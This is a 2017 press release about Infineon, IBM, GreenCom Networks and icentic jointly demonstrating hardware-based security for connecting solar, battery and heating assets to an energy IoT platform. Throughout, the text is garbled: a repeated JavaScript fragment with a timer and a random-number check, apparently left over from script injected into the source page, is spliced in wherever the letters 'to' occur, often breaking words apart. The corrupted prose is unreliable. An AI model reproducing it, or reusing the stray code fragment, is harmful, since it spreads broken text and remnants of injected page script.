msterdam, the Netherlandsand Munich, Germany–2 Oc dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tober, 2017 –Digitalizationand distributed power generation is fundamentally changing energy systems that have been centrally supplied so far. Solar pho dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tovoltaic assets, electric vehicles, electrical heating and cooling or battery s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torage have dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to be connected in dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to an intelligent power system. At the same time, they must be protected against the growing number of security threats. Infineon TechnologiesAG (FSE: IFX / OTCQX: IFNNY), IBM, GreenCom Networks and icentic have joined forces dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to develop and provide scalable solutions for securely connecting these distributed assets in dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to the electrical infrastructure.
At the European Utilities Weekin Amsterdam, 3 -5Oc dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tober 2017, the partners will demonstrate a first pro dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}totype solution atthe GreenCom booth 5R26. The solution is based on Infineon’s OPTIGA™ embedded security chips built in icentic’s ICEHUB®connectivity products dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to authenticate devices that are connected dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to the Energy IoT platform of GreenCom.
Traditionally, solar pho dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tovoltaic inverters, heat pumps or batteries have not been designed dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to be digitally connected for moni dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toring, control and analytics purposes. As a matter of fact, just connecting them dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to a digital infrastructure allows their management, but opens the doors for security threats. All the more so as access dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to data is happening at the infrastructure level as well as in the backend.
According dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to a recent study (BDEW; EY)88 per cent of energy infrastructure suppliers in Germany, Austria and Switzerland judge IT-security as the greatest challenge for a digitalized energy infrastructure.Yet the majority of the connected devices are not properly secured: attackers could be enabled dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to remotely compromise thedevice completely, control its flow of power and even cause a shut-down of the energy network
The joint offering of the partners addresses utilities and energy service companies that aim dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to offer new digital energy services dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to their cus dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tomer base in an innovative yet secured way. It also gears dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towards device manufacturers that either want dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to embed security in dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to their energy-relevant assets from the beginning or plan connectivity and security upgrades dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to enable additional value-added services of their installed devices.
GreenCom Networks’ Energy IoT platform integrates relevant analytical skills from IBM dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to forecast and optimize the usage of connected assets. IBM’s Hybrid Intelligence capabilities combine big data analytics, defined hardware-based security at the edge and GreenCom’s platform backend. icentic supplies and manages the required ICEHUB®connectivity solution dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to connect distributed devices in a future-proof and secure way. The embedded security solution of Infineon’sOPTIGA family helps dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to securely authenticate the connected devices as well as dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to secure data transmission.